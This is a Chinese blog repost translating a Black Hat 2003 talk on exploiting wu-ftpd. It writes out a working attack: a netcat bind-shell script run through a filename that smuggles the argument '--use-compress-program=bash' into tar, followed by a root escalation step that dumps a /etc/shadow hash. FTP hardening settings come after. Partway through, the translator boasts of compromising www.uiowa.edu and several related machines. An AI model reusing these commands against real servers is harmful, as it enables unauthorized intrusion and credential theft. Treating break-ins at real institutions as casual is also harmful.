首页 电脑 电脑学堂 查看内容

blackhat 2003 黑客大会的另外一篇关于UNIX ftp入侵

2004-12-5 08:32 508 0

摘要: 翻译:cnbird  来自:http://cnbird.99blog.com/ QQ:550669 题目:blackhat 2003 黑客大会的另外一篇关于UNIX ftp入侵(第一部分)的步骤与防...
关键词: nbsp ftp tar compress anonymous home ftpd blah bash root

翻译:cnbird  来自:http://cnbird.99blog.com/ QQ:550669 题目:blackhat 2003 黑客大会的另外一篇关于UNIX ftp入侵(第一部分)的步骤与防御方法 1.描述.               ①对wu-ftpd工作的代码               ②对wu-ftpd配置的攻击               ③对wu-ftpd发出挑战 2.FTP漏洞变换         注:不是一个缓冲区溢出         在 特色的wu-ftpd用这个"为我上传的tar文件".        目标:WU-FTPD2.4.X-2.6.0(RH<=6.2 SUSE<=7.3,IMMunix<=6.2) 3.开始准备       $cat > script       #!/bin/bash;       nc -l -p 6666 -e /bin/bash;        <CTRL-D>        $tar -cf b.tar nc script         $cat >blah         #          tar -xf b.tar           ./script           <CTRL-D> 4.利用         $csh          $echo > '--use-compreee-program=bash blah'          $ftp target (用用户登陆)          ftp>put b.tar          ftp>put blah          ftp>put "--use-compress-program=bash blah"          ftp>get "use-compress-program=bash blah".tar   5:远程shell $ nc target 6666 我们已经得到了一个远程shell当我们登陆作为的用户的特权 如果我们想得到rootshell,我们需要为我们的特权铺路. 6.rootshell??????         $tar -cf b.tar nc script userrooter.sh         $ ftp target          ftp> put b.tar           ftp> get "--use-compress-program=bash blah".tar $nc target 6666  ./userrooter.sh userrooter by S gerp root /etc/shadow root:$1$MU.tGav3$X8WISNGV92c.Oxfe0pvqb1:11870:0:9999:7:-1:-1:134538460 7.joy.  这个代码难在实现匿名登陆上,但是这不成问题 入侵很难,主要是因为我们的chrooted没有远去. (注:chroot能保护正常的用户进入) 8:避免 我们可以通过配置ftpd守护进程的方法来关闭tar和compression(都是UNIX下的压缩命令)以达到防御这个漏洞的目的. 我们也可以确信这个登陆到服务器的anonymous匿名用户不能上传这些文件. 下面详细介绍这个内容. 9.一个/etc/ftpaccess文件 class             real,guest,anonymous * email             root@localhost message        /welcom.msg login message        ./message  cwd=* compress        yes all tar                    yes all chmod              no    guest,anonymoius delete               no    guest,anonmyous overwrite           no    guest,anonymous rename              no    guest,anonymous log                      transfers     vanonymous.real     inbound,outbound passwd-check   rfc822 warn 暂时翻译到这里吧...spirit让我去入侵一台edu的机器..www.uiowa.edu是AIX fog 2 5 000D09DD4C00的系统去看看了.等我收拾完这台机器再来继续写啊.. 恩我回来了,www.uiowa.edu已经摆平了,而且和spirit成功的渗透了7-8台隶属于www.uiowa.edu的机器,现在没事干了继续翻译吧....哎...大家赶紧给我投资点吧..学生穷啊。..上网都成问题了......哈哈好了不废话了继续...10.解散tar和compress我们可以这样配置..compress no alltar no allchmod no anonymousdelete no anonymousoverwrite no anonymousrename no anonymous12.匿名上传??????????????匿名上传是非常危险的,但是我们能减少危害,首先,设置好的权限.mkdir /home/ftp/incomingchown root.root /home/ftp/incomingchmod 333 /home/ftp/incomingchmod a-w /home/ftp第二,为所有的incoming文件配置所有默认的权限via /etc/ftpaccessupload /home/ftp/incoming yes root ftp 0600 nodirsNoretrieve /home/ftp/incoing好的第一部分的就到这里~下次继续啊~~这些都是比较简单的,下次我将深入讲解ftp的攻击方式,警请大家关注我550669和我的blog:http://cnbird.99blog.com希望大家多和我讨论技术....
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部